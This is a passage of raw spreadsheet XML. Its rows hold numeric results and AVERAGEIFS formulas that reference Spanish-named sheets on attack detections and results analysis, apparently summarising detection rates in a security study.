      <c r="V507" s="42" t="s">
        <v>1373</v>
      </c>
      <c r="W507" s="888">
        <v>4.944444444444445</v>
      </c>
      <c r="X507" s="757">
        <v>1.0</v>
      </c>
      <c r="Y507" s="888">
        <v>0.5</v>
      </c>
    </row>
    <row r="508">
      <c r="K508" s="42" t="s">
        <v>209</v>
      </c>
      <c r="L508" s="888">
        <v>9.333333333333334</v>
      </c>
      <c r="M508" s="888">
        <v>0.6666666666666666</v>
      </c>
      <c r="V508" s="42" t="s">
        <v>209</v>
      </c>
      <c r="W508" s="888">
        <v>9.333333333333334</v>
      </c>
      <c r="X508" s="757">
        <v>1.0</v>
      </c>
      <c r="Y508" s="888">
        <v>0.6666666666666666</v>
      </c>
    </row>
    <row r="509">
      <c r="K509" s="42" t="s">
        <v>664</v>
      </c>
      <c r="L509" s="888">
        <v>10.833333333333334</v>
      </c>
      <c r="M509" s="888">
        <v>0.3333333333333333</v>
      </c>
      <c r="V509" s="42" t="s">
        <v>664</v>
      </c>
      <c r="W509" s="888">
        <v>10.833333333333334</v>
      </c>
      <c r="X509" s="757">
        <v>2.0</v>
      </c>
      <c r="Y509" s="888">
        <v>0.3333333333333333</v>
      </c>
    </row>
    <row r="510">
      <c r="K510" s="42" t="s">
        <v>357</v>
      </c>
      <c r="L510" s="888">
        <v>11.2</v>
      </c>
      <c r="M510" s="888">
        <v>1.0</v>
      </c>
      <c r="V510" s="42" t="s">
        <v>357</v>
      </c>
      <c r="W510" s="888">
        <v>11.2</v>
      </c>
      <c r="X510" s="757">
        <v>2.0</v>
      </c>
      <c r="Y510" s="888">
        <v>1.0</v>
      </c>
    </row>
    <row r="511">
      <c r="K511" s="42" t="s">
        <v>310</v>
      </c>
      <c r="L511" s="888">
        <v>5.8</v>
      </c>
      <c r="M511" s="888">
        <v>21.4</v>
      </c>
      <c r="V511" s="42" t="s">
        <v>310</v>
      </c>
      <c r="W511" s="888">
        <v>5.8</v>
      </c>
      <c r="X511" s="757">
        <v>16.0</v>
      </c>
      <c r="Y511" s="888">
        <v>21.4</v>
      </c>
    </row>
    <row r="512">
      <c r="K512" s="42" t="s">
        <v>292</v>
      </c>
      <c r="L512" s="888">
        <v>14.5</v>
      </c>
      <c r="M512" s="888">
        <v>0.0</v>
      </c>
      <c r="V512" s="42" t="s">
        <v>292</v>
      </c>
      <c r="W512" s="888">
        <v>14.5</v>
      </c>
      <c r="X512" s="757">
        <v>0.0</v>
      </c>
      <c r="Y512" s="888">
        <v>0.0</v>
      </c>
    </row>
    <row r="513">
      <c r="K513" s="42" t="s">
        <v>558</v>
      </c>
      <c r="L513" s="888">
        <v>24.0</v>
      </c>
      <c r="M513" s="888">
        <v>0.5</v>
      </c>
      <c r="V513" s="42" t="s">
        <v>558</v>
      </c>
      <c r="W513" s="888">
        <v>24.0</v>
      </c>
      <c r="X513" s="757">
        <v>6.0</v>
      </c>
      <c r="Y513" s="888">
        <v>0.5</v>
      </c>
    </row>
    <row r="516">
      <c r="K516" s="42" t="s">
        <v>2816</v>
      </c>
      <c r="V516" s="42" t="s">
        <v>2816</v>
      </c>
    </row>
    <row r="517">
      <c r="K517" s="42" t="s">
        <v>2448</v>
      </c>
      <c r="L517" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="M517" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="V517" s="42" t="s">
        <v>2448</v>
      </c>
      <c r="W517" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="X517" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="Y517" s="42" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="518">
      <c r="K518" s="42" t="s">
        <v>2093</v>
      </c>
      <c r="L518" s="889">
        <v>0.45</v>
      </c>
      <c r="M518" s="889">
        <v>1.0</v>
      </c>
      <c r="V518" s="42" t="s">
        <v>2093</v>
      </c>
      <c r="W518" s="757">
        <v>0.45</v>
      </c>
      <c r="X518" s="757">
        <v>0.5294117647058824</v>
      </c>
      <c r="Y518" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="519">
      <c r="K519" s="42" t="s">
        <v>2013</v>
      </c>
      <c r="L519" s="889" t="s">
        <v>12</v>
      </c>
      <c r="M519" s="889">
        <v>1.0</v>
      </c>
      <c r="V519" s="42" t="s">
        <v>2013</v>
      </c>
      <c r="W519" s="757" t="s">
        <v>12</v>
      </c>
      <c r="X519" s="757">
        <v>1.0</v>
      </c>
      <c r="Y519" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="520">
      <c r="K520" s="42" t="s">
        <v>951</v>
      </c>
      <c r="L520" s="889">
        <v>0.5483870967741935</v>
      </c>
      <c r="M520" s="889">
        <v>1.0</v>
      </c>
      <c r="V520" s="42" t="s">
        <v>951</v>
      </c>
      <c r="W520" s="757">
        <v>0.5483870967741935</v>
      </c>
      <c r="X520" s="757">
        <v>0.75</v>
      </c>
      <c r="Y520" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="521">
      <c r="K521" s="42" t="s">
        <v>633</v>
      </c>
      <c r="L521" s="889">
        <v>0.5384615384615384</v>
      </c>
      <c r="M521" s="889">
        <v>1.0</v>
      </c>
      <c r="V521" s="42" t="s">
        <v>633</v>
      </c>
      <c r="W521" s="757">
        <v>0.5384615384615384</v>
      </c>
      <c r="X521" s="757">
        <v>1.0</v>
      </c>
      <c r="Y521" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="522">
      <c r="K522" s="42" t="s">
        <v>1725</v>
      </c>
      <c r="L522" s="889">
        <v>0.0</v>
      </c>
      <c r="M522" s="889" t="s">
        <v>12</v>
      </c>
      <c r="V522" s="42" t="s">
        <v>1725</v>
      </c>
      <c r="W522" s="757">
        <v>0.0</v>
      </c>
      <c r="X522" s="757">
        <v>0.0</v>
      </c>
      <c r="Y522" s="757" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="523">
      <c r="K523" s="42" t="s">
        <v>244</v>
      </c>
      <c r="L523" s="889">
        <v>0.0</v>
      </c>
      <c r="M523" s="889">
        <v>1.0</v>
      </c>
      <c r="V523" s="42" t="s">
        <v>244</v>
      </c>
      <c r="W523" s="757">
        <v>0.0</v>
      </c>
      <c r="X523" s="757">
        <v>0.5833333333333334</v>
      </c>
      <c r="Y523" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="524">
      <c r="K524" s="42" t="s">
        <v>427</v>
      </c>
      <c r="L524" s="889">
        <v>0.0</v>
      </c>
      <c r="M524" s="889">
        <v>1.0</v>
      </c>
      <c r="V524" s="42" t="s">
        <v>427</v>
      </c>
      <c r="W524" s="757">
        <v>0.0</v>
      </c>
      <c r="X524" s="757">
        <v>0.0</v>
      </c>
      <c r="Y524" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="525">
      <c r="K525" s="42" t="s">
        <v>1373</v>
      </c>
      <c r="L525" s="889">
        <v>0.25</v>
      </c>
      <c r="M525" s="889">
        <v>1.0</v>
      </c>
      <c r="V525" s="42" t="s">
        <v>1373</v>
      </c>
      <c r="W525" s="757">
        <v>0.25</v>
      </c>
      <c r="X525" s="757">
        <v>0.6666666666666666</v>
      </c>
      <c r="Y525" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="526">
      <c r="K526" s="42" t="s">
        <v>209</v>
      </c>
      <c r="L526" s="889">
        <v>0.22727272727272727</v>
      </c>
      <c r="M526" s="889">
        <v>1.0</v>
      </c>
      <c r="V526" s="42" t="s">
        <v>209</v>
      </c>
      <c r="W526" s="757">
        <v>0.22727272727272727</v>
      </c>
      <c r="X526" s="757">
        <v>0.42105263157894735</v>
      </c>
      <c r="Y526" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="527">
      <c r="K527" s="42" t="s">
        <v>664</v>
      </c>
      <c r="L527" s="889">
        <v>0.15</v>
      </c>
      <c r="M527" s="889">
        <v>1.0</v>
      </c>
      <c r="V527" s="42" t="s">
        <v>664</v>
      </c>
      <c r="W527" s="757">
        <v>0.15</v>
      </c>
      <c r="X527" s="757">
        <v>0.4090909090909091</v>
      </c>
      <c r="Y527" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="528">
      <c r="K528" s="42" t="s">
        <v>357</v>
      </c>
      <c r="L528" s="889">
        <v>0.38461538461538464</v>
      </c>
      <c r="M528" s="889">
        <v>1.0</v>
      </c>
      <c r="V528" s="42" t="s">
        <v>357</v>
      </c>
      <c r="W528" s="757">
        <v>0.38461538461538464</v>
      </c>
      <c r="X528" s="757">
        <v>0.8</v>
      </c>
      <c r="Y528" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="529">
      <c r="K529" s="42" t="s">
        <v>310</v>
      </c>
      <c r="L529" s="889">
        <v>0.5833333333333334</v>
      </c>
      <c r="M529" s="889">
        <v>1.0</v>
      </c>
      <c r="V529" s="42" t="s">
        <v>310</v>
      </c>
      <c r="W529" s="757">
        <v>0.5833333333333334</v>
      </c>
      <c r="X529" s="757">
        <v>0.9634146341463414</v>
      </c>
      <c r="Y529" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="530">
      <c r="K530" s="42" t="s">
        <v>292</v>
      </c>
      <c r="L530" s="889">
        <v>0.125</v>
      </c>
      <c r="M530" s="889" t="s">
        <v>12</v>
      </c>
      <c r="V530" s="42" t="s">
        <v>292</v>
      </c>
      <c r="W530" s="757">
        <v>0.125</v>
      </c>
      <c r="X530" s="757">
        <v>0.0</v>
      </c>
      <c r="Y530" s="757" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="531">
      <c r="K531" s="42" t="s">
        <v>558</v>
      </c>
      <c r="L531" s="889">
        <v>0.35714285714285715</v>
      </c>
      <c r="M531" s="889">
        <v>1.0</v>
      </c>
      <c r="V531" s="42" t="s">
        <v>558</v>
      </c>
      <c r="W531" s="757">
        <v>0.35714285714285715</v>
      </c>
      <c r="X531" s="757">
        <v>0.9230769230769231</v>
      </c>
      <c r="Y531" s="757">
        <v>1.0</v>
      </c>
    </row>
    <row r="547">
      <c r="L547" s="42" t="s">
        <v>2544</v>
      </c>
      <c r="M547" s="42" t="s">
        <v>2545</v>
      </c>
      <c r="W547" s="42" t="s">
        <v>2544</v>
      </c>
      <c r="X547" s="42" t="s">
        <v>2545</v>
      </c>
    </row>
    <row r="548">
      <c r="K548" s="45" t="s">
        <v>2731</v>
      </c>
      <c r="L548" s="564">
        <v>0.0</v>
      </c>
      <c r="M548" s="564">
        <v>0.8478260869565217</v>
      </c>
      <c r="V548" s="42" t="s">
        <v>2731</v>
      </c>
      <c r="W548" s="69">
        <v>0.0</v>
      </c>
      <c r="X548" s="69">
        <v>0.8478260869565217</v>
      </c>
    </row>
    <row r="549">
      <c r="K549" s="45" t="s">
        <v>2730</v>
      </c>
      <c r="L549" s="564">
        <v>0.07602339181286555</v>
      </c>
      <c r="M549" s="564">
        <v>0.6521739130434783</v>
      </c>
      <c r="V549" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="W549" s="69">
        <v>0.07602339181286555</v>
      </c>
      <c r="X549" s="69">
        <v>0.6521739130434783</v>
      </c>
    </row>
    <row r="550">
      <c r="K550" s="45" t="s">
        <v>2729</v>
      </c>
      <c r="L550" s="564">
        <v>0.09523809523809523</v>
      </c>
      <c r="M550" s="564">
        <v>0.6689189189189189</v>
      </c>
      <c r="V550" s="42" t="s">
        <v>2729</v>
      </c>
      <c r="W550" s="69">
        <v>0.09523809523809523</v>
      </c>
      <c r="X550" s="69">
        <v>0.6689189189189189</v>
      </c>
    </row>
    <row r="551">
      <c r="K551" s="45" t="s">
        <v>2728</v>
      </c>
      <c r="L551" s="564">
        <v>0.3695652173913043</v>
      </c>
      <c r="M551" s="564">
        <v>0.816793893129771</v>
      </c>
      <c r="V551" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="W551" s="69">
        <v>0.3695652173913043</v>
      </c>
      <c r="X551" s="69">
        <v>0.816793893129771</v>
      </c>
    </row>
    <row r="552">
      <c r="K552" s="21" t="s">
        <v>2732</v>
      </c>
      <c r="L552" s="802">
        <v>0.0</v>
      </c>
      <c r="M552" s="802">
        <v>0.0</v>
      </c>
      <c r="V552" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="W552" s="338">
        <f>'(D) - Análisis Resultados III -'!DO23</f>
        <v>0.131147541</v>
      </c>
      <c r="X552" s="338">
        <f>'(D) - Análisis Resultados III -'!DI23</f>
        <v>0.2745901639</v>
      </c>
    </row>
    <row r="553">
      <c r="K553" s="36"/>
      <c r="L553" s="36"/>
      <c r="M553" s="36"/>
      <c r="V553" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="W553" s="338">
        <v>0.0</v>
      </c>
      <c r="X553" s="338">
        <v>0.0</v>
      </c>
    </row>
    <row r="571">
      <c r="L571" s="42"/>
      <c r="M571" s="45" t="s">
        <v>226</v>
      </c>
      <c r="O571" s="45" t="s">
        <v>306</v>
      </c>
      <c r="W571" s="42"/>
      <c r="X571" s="42" t="s">
        <v>226</v>
      </c>
      <c r="Z571" s="42" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="572">
      <c r="L572" s="42" t="s">
        <v>2454</v>
      </c>
      <c r="M572" s="42" t="s">
        <v>2455</v>
      </c>
      <c r="N572" s="42" t="s">
        <v>2456</v>
      </c>
      <c r="O572" s="42" t="s">
        <v>2455</v>
      </c>
      <c r="P572" s="42" t="s">
        <v>2456</v>
      </c>
      <c r="W572" s="42" t="s">
        <v>2454</v>
      </c>
      <c r="X572" s="42" t="s">
        <v>2455</v>
      </c>
      <c r="Y572" s="42" t="s">
        <v>2456</v>
      </c>
      <c r="Z572" s="42" t="s">
        <v>2455</v>
      </c>
      <c r="AA572" s="42" t="s">
        <v>2456</v>
      </c>
    </row>
    <row r="573">
      <c r="L573" s="42" t="s">
        <v>2731</v>
      </c>
      <c r="M573" s="69">
        <v>0.05618851067676458</v>
      </c>
      <c r="N573" s="69">
        <v>0.10714285714285714</v>
      </c>
      <c r="O573" s="69">
        <v>0.018518518518518517</v>
      </c>
      <c r="P573" s="69">
        <v>0.037037037037037035</v>
      </c>
      <c r="W573" s="42" t="s">
        <v>2731</v>
      </c>
      <c r="X573" s="69">
        <v>0.05618851067676458</v>
      </c>
      <c r="Y573" s="69">
        <v>0.10714285714285714</v>
      </c>
      <c r="Z573" s="69">
        <v>0.018518518518518517</v>
      </c>
      <c r="AA573" s="69">
        <v>0.037037037037037035</v>
      </c>
    </row>
    <row r="574">
      <c r="L574" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="M574" s="69">
        <v>0.25518523729667536</v>
      </c>
      <c r="N574" s="69">
        <v>0.32727272727272727</v>
      </c>
      <c r="O574" s="69">
        <v>0.1414141414141414</v>
      </c>
      <c r="P574" s="69">
        <v>0.18518518518518517</v>
      </c>
      <c r="W574" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="X574" s="69">
        <v>0.25518523729667536</v>
      </c>
      <c r="Y574" s="69">
        <v>0.32727272727272727</v>
      </c>
      <c r="Z574" s="69">
        <v>0.1414141414141414</v>
      </c>
      <c r="AA574" s="69">
        <v>0.18518518518518517</v>
      </c>
    </row>
    <row r="575">
      <c r="L575" s="42" t="s">
        <v>2729</v>
      </c>
      <c r="M575" s="69">
        <v>0.41882160093303894</v>
      </c>
      <c r="N575" s="69">
        <v>0.4909090909090909</v>
      </c>
      <c r="O575" s="69">
        <v>0.29292929292929293</v>
      </c>
      <c r="P575" s="69">
        <v>0.3333333333333333</v>
      </c>
      <c r="W575" s="42" t="s">
        <v>2729</v>
      </c>
      <c r="X575" s="69">
        <v>0.41882160093303894</v>
      </c>
      <c r="Y575" s="69">
        <v>0.4909090909090909</v>
      </c>
      <c r="Z575" s="69">
        <v>0.29292929292929293</v>
      </c>
      <c r="AA575" s="69">
        <v>0.3333333333333333</v>
      </c>
    </row>
    <row r="576">
      <c r="L576" s="888" t="s">
        <v>2728</v>
      </c>
      <c r="M576" s="69">
        <v>0.4835250381992903</v>
      </c>
      <c r="N576" s="69">
        <v>0.5636363636363636</v>
      </c>
      <c r="O576" s="338">
        <v>0.3142536475869809</v>
      </c>
      <c r="P576" s="338">
        <v>0.37037037037037035</v>
      </c>
      <c r="W576" s="888" t="s">
        <v>2728</v>
      </c>
      <c r="X576" s="69">
        <v>0.4835250381992903</v>
      </c>
      <c r="Y576" s="69">
        <v>0.5636363636363636</v>
      </c>
      <c r="Z576" s="338">
        <v>0.3142536475869809</v>
      </c>
      <c r="AA576" s="338">
        <v>0.37037037037037035</v>
      </c>
    </row>
    <row r="577">
      <c r="L577" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="M577" s="69">
        <v>0.516494177131984</v>
      </c>
      <c r="N577" s="69">
        <v>0.6557377049180327</v>
      </c>
      <c r="O577" s="69">
        <v>0.7104377104377105</v>
      </c>
      <c r="P577" s="69">
        <v>0.8148148148148148</v>
      </c>
      <c r="W577" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="X577" s="69">
        <f>'(D) - Análisis Resultados III -'!FI23</f>
        <v>0.6230699837</v>
      </c>
      <c r="Y577" s="69">
        <f>'(D) - Análisis Resultados III -'!FJ23</f>
        <v>0.6721311475</v>
      </c>
      <c r="Z577" s="69">
        <f>'(D) - Análisis Resultados III -'!FI24</f>
        <v>0.5527497194</v>
      </c>
      <c r="AA577" s="69">
        <f>'(D) - Análisis Resultados III -'!FJ24</f>
        <v>0.7777777778</v>
      </c>
    </row>
    <row r="578">
      <c r="W578" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="X578" s="69">
        <v>0.516494177131984</v>
      </c>
      <c r="Y578" s="69">
        <v>0.6557377049180327</v>
      </c>
      <c r="Z578" s="69">
        <v>0.7104377104377105</v>
      </c>
      <c r="AA578" s="69">
        <v>0.8148148148148148</v>
      </c>
    </row>
    <row r="603">
      <c r="K603" s="890" t="s">
        <v>2457</v>
      </c>
      <c r="L603" s="693" t="s">
        <v>2728</v>
      </c>
      <c r="M603" s="694" t="s">
        <v>2732</v>
      </c>
      <c r="W603" s="42" t="s">
        <v>2457</v>
      </c>
      <c r="X603" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="Y603" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="Z603" s="42" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="604">
      <c r="K604" s="299" t="s">
        <v>236</v>
      </c>
      <c r="L604" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG28)</f>
        <v>0.3333333333</v>
      </c>
      <c r="M604" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN11)</f>
        <v>0.3333333333</v>
      </c>
      <c r="W604" s="417" t="s">
        <v>236</v>
      </c>
      <c r="X604" s="69">
        <v>0.3333333333333333</v>
      </c>
      <c r="Y604" s="69">
        <f>'(D) - Análisis Resultados III -'!FT11</f>
        <v>0.3333333333</v>
      </c>
      <c r="Z604" s="69">
        <v>0.3333333333333333</v>
      </c>
    </row>
    <row r="605">
      <c r="K605" s="299" t="s">
        <v>253</v>
      </c>
      <c r="L605" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="M605" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN12)</f>
        <v>0.6666666667</v>
      </c>
      <c r="W605" s="417" t="s">
        <v>253</v>
      </c>
      <c r="X605" s="69">
        <v>0.6666666666666666</v>
      </c>
      <c r="Y605" s="69">
        <f>'(D) - Análisis Resultados III -'!FT12</f>
        <v>0.6666666667</v>
      </c>
      <c r="Z605" s="69">
        <v>0.6666666666666666</v>
      </c>
    </row>
    <row r="606">
      <c r="K606" s="299" t="s">
        <v>267</v>
      </c>
      <c r="L606" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG30)</f>
        <v>0.2</v>
      </c>
      <c r="M606" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN13)</f>
        <v>1</v>
      </c>
      <c r="W606" s="417" t="s">
        <v>267</v>
      </c>
      <c r="X606" s="69">
        <v>0.2</v>
      </c>
      <c r="Y606" s="69">
        <f>'(D) - Análisis Resultados III -'!FT14</f>
        <v>0.5</v>
      </c>
      <c r="Z606" s="69">
        <v>1.0</v>
      </c>
    </row>
    <row r="607">
      <c r="K607" s="891" t="s">
        <v>317</v>
      </c>
      <c r="L607" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG31)</f>
        <v>0.6111111111</v>
      </c>
      <c r="M607" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN14)</f>
        <v>0.6666666667</v>
      </c>
      <c r="W607" s="42" t="s">
        <v>317</v>
      </c>
      <c r="X607" s="69">
        <v>0.6111111111111112</v>
      </c>
      <c r="Y607" s="69">
        <f>'(D) - Análisis Resultados III -'!FT15</f>
        <v>1</v>
      </c>
      <c r="Z607" s="69">
        <v>0.6666666666666666</v>
      </c>
    </row>
    <row r="608">
      <c r="K608" s="891" t="s">
        <v>218</v>
      </c>
      <c r="L608" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="M608" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN15)</f>
        <v>1</v>
      </c>
      <c r="W608" s="42" t="s">
        <v>218</v>
      </c>
      <c r="X608" s="69">
        <v>0.42857142857142855</v>
      </c>
      <c r="Y608" s="69">
        <f>'(D) - Análisis Resultados III -'!FT16</f>
        <v>0.7826086957</v>
      </c>
      <c r="Z608" s="69">
        <v>1.0</v>
      </c>
    </row>
    <row r="609">
      <c r="K609" s="892" t="s">
        <v>375</v>
      </c>
      <c r="L609" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG33)</f>
        <v>0.4736842105</v>
      </c>
      <c r="M609" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN16)</f>
        <v>0.7826086957</v>
      </c>
      <c r="W609" s="69" t="s">
        <v>375</v>
      </c>
      <c r="X609" s="69">
        <v>0.47368421052631576</v>
      </c>
      <c r="Y609" s="69">
        <f>'(D) - Análisis Resultados III -'!FT17</f>
        <v>0.5</v>
      </c>
      <c r="Z609" s="69">
        <v>0.782608695652174</v>
      </c>
    </row>
    <row r="610">
      <c r="K610" s="299" t="s">
        <v>608</v>
      </c>
      <c r="L610" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG34)</f>
        <v>0</v>
      </c>
      <c r="M610" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN17)</f>
        <v>0</v>
      </c>
      <c r="W610" s="417" t="s">
        <v>608</v>
      </c>
      <c r="X610" s="69">
        <v>0.0</v>
      </c>
      <c r="Y610" s="69">
        <f>'(D) - Análisis Resultados III -'!FT18</f>
        <v>0.75</v>
      </c>
      <c r="Z610" s="69">
        <v>0.0</v>
      </c>
    </row>
    <row r="611">
      <c r="K611" s="299" t="s">
        <v>679</v>
      </c>
      <c r="L611" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG35)</f>
        <v>1</v>
      </c>
      <c r="M611" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN18)</f>
        <v>0.75</v>
      </c>
      <c r="W611" s="417" t="s">
        <v>679</v>
      </c>
      <c r="X611" s="69">
        <v>1.0</v>
      </c>
      <c r="Y611" s="69">
        <f>'(D) - Análisis Resultados III -'!FT19</f>
        <v>1</v>
      </c>
      <c r="Z611" s="69">
        <v>0.75</v>
      </c>
    </row>
    <row r="612">
      <c r="K612" s="891" t="s">
        <v>399</v>
      </c>
      <c r="L612" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG36)</f>
        <v>0.6666666667</v>
      </c>
      <c r="M612" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN19)</f>
        <v>1</v>
      </c>
      <c r="W612" s="42" t="s">
        <v>399</v>
      </c>
      <c r="X612" s="69">
        <v>0.6666666666666666</v>
      </c>
      <c r="Y612" s="69">
        <f>'(D) - Análisis Resultados III -'!FT20</f>
        <v>0</v>
      </c>
      <c r="Z612" s="69">
        <v>1.0</v>
      </c>
    </row>
    <row r="613">
      <c r="K613" s="891" t="s">
        <v>897</v>
      </c>
      <c r="L613" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG37)</f>
        <v>1</v>
      </c>
      <c r="M613" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN20)</f>
        <v>0</v>
      </c>
      <c r="W613" s="42" t="s">
        <v>897</v>
      </c>
      <c r="X613" s="69">
        <v>1.0</v>
      </c>
      <c r="Y613" s="69">
        <f>'(D) - Análisis Resultados III -'!FT21</f>
        <v>0.5</v>
      </c>
      <c r="Z613" s="69">
        <v>0.0</v>
      </c>
    </row>
    <row r="614">
      <c r="K614" s="892" t="s">
        <v>1141</v>
      </c>
      <c r="L614" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG38)</f>
        <v>1</v>
      </c>
      <c r="M614" s="337">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados II - '!FN21)</f>
        <v>0.5</v>
      </c>
      <c r="W614" s="69" t="s">
        <v>1141</v>
      </c>
      <c r="X614" s="69">
        <v>1.0</v>
      </c>
      <c r="Y614" s="69">
        <f>'(D) - Análisis Resultados III -'!FT22</f>
        <v>1</v>
      </c>
      <c r="Z614" s="69">
        <v>0.5</v>
      </c>
    </row>
    <row r="615">
      <c r="K615" s="299" t="s">
        <v>1234</v>
      </c>
      <c r="L615" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,'(D) - Análisis Resultados I - S'!GG39)</f>
        <v>1</v>
